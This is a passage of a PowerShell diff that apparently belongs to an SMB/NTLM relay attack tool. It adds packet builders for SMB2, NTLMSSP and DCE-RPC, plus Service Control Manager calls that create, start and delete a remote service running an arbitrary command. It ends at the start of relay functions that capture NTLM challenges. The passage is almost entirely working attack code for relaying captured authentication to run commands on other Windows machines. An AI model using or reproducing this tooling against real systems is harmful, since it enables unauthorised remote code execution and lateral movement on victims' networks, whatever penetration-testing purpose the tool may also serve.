+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+ }
+
+ function New-PacketSMB2SessionSetupRequest
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+ }
+
+ function New-PacketSMB2TreeConnectRequest
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+ }
+
+ function New-PacketSMB2CreateRequestFile
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+
+ $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequestFile.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameLength",$packet_named_pipe_length)
+ $packet_SMB2CreateRequestFile.Add("CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Buffer",$packet_named_pipe)
+
+ return $packet_SMB2CreateRequestFile
+ }
+
+ function New-PacketSMB2ReadRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $packet_SMB2ReadRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+ }
+
+ function New-PacketSMB2WriteRequest
+ {
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_write_length)
+ $packet_SMB2WriteRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2WriteRequest
+ }
+
+ function New-PacketSMB2CloseRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+ }
+
+ function New-PacketSMB2TreeDisconnectRequest
+ {
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+ }
+
+ function New-PacketSMB2SessionLogoffRequest
+ {
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+ }
+
+ #NTLM
+
+ function New-PacketNTLMSSPNegotiate
+ {
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+ }
+
+ function New-PacketNTLMSSPAuth
+ {
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+ }
+
+ #RPC
+
+ function New-PacketRPCBind
+ {
+ param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
+
+ [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
+
+ $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCBind.Add("Version",[Byte[]](0x05))
+ $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCBind.Add("PacketType",[Byte[]](0x0b))
+ $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03))
+ $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00))
+ $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("CallID",$packet_call_ID_bytes)
+ $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items)
+ $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID",$packet_context_ID)
+ $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown2",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface",$packet_UUID)
+ $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version)
+ $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($packet_num_ctx_items[0] -eq 2)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($packet_num_ctx_items[0] -eq 3)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00))
+ $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown4",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ if($packet_call_ID -eq 3)
+ {
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $packet_RPCBind
+ }
+
+ function New-PacketRPCRequest
+ {
+ param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
+
+ if($packet_auth_length -gt 0)
+ {
+ $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
+ }
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
+ [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
+ $packet_auth_length = $packet_auth_length[0,1]
+
+ $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCRequest.Add("Version",[Byte[]](0x05))
+ $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketType",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketFlags",$packet_flags)
+ $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCRequest.Add("FragLength",$packet_frag_length)
+ $packet_RPCRequest.Add("AuthLength",$packet_auth_length)
+ $packet_RPCRequest.Add("CallID",$packet_call_ID)
+ $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint)
+ $packet_RPCRequest.Add("ContextID",$packet_context_ID)
+ $packet_RPCRequest.Add("Opnum",$packet_opnum)
+
+ if($packet_data.Length)
+ {
+ $packet_RPCRequest.Add("Data",$packet_data)
+ }
+
+ return $packet_RPCRequest
+ }
+
+ #SCM
+
+ function New-PacketSCMOpenSCManagerW
+ {
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+ }
+
+ function New-PacketSCMCreateServiceW
+ {
+ param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
+ [Byte[]]$packet_command,[Byte[]]$packet_command_length)
+
+ $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID += 0x00,0x00
+
+ $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMCreateServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMCreateServiceW.Add("ServiceName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName",$packet_service)
+ $packet_SCMCreateServiceW.Add("DisplayName_ReferentID",$packet_referent_ID)
+ $packet_SCMCreateServiceW.Add("DisplayName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DisplayName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName",$packet_service)
+ $packet_SCMCreateServiceW.Add("AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_MaxCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_ActualCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName",$packet_command)
+ $packet_SCMCreateServiceW.Add("NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SCMCreateServiceW
+ }
+
+ function New-PacketSCMStartServiceW
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMStartServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMStartServiceW.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SCMStartServiceW
+ }
+
+ function New-PacketSCMDeleteServiceW
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMDeleteServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCMDeleteServiceW
+ }
+
+ function New-PacketSCMCloseServiceHandle
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCM_CloseServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCM_CloseServiceW
+ }
+
+}
+
+# Relay Functions ScriptBlock
+$SMB_relay_functions_scriptblock =
+{
+
+ function SMBNTLMChallenge
+ {
+ param ([Byte[]]$payload_bytes)
+
+ $payload = [System.BitConverter]::ToString($payload_bytes)
+ $payload = $payload -replace "-",""
+ $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+
+ if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+ {
+ $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+ }
+
+ return $NTLM_challenge
+ }
+
+ function SMBRelayChallenge
+ {
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check)
+
+ if($SMB_relay_socket)
+ {
+ $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
+ }
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
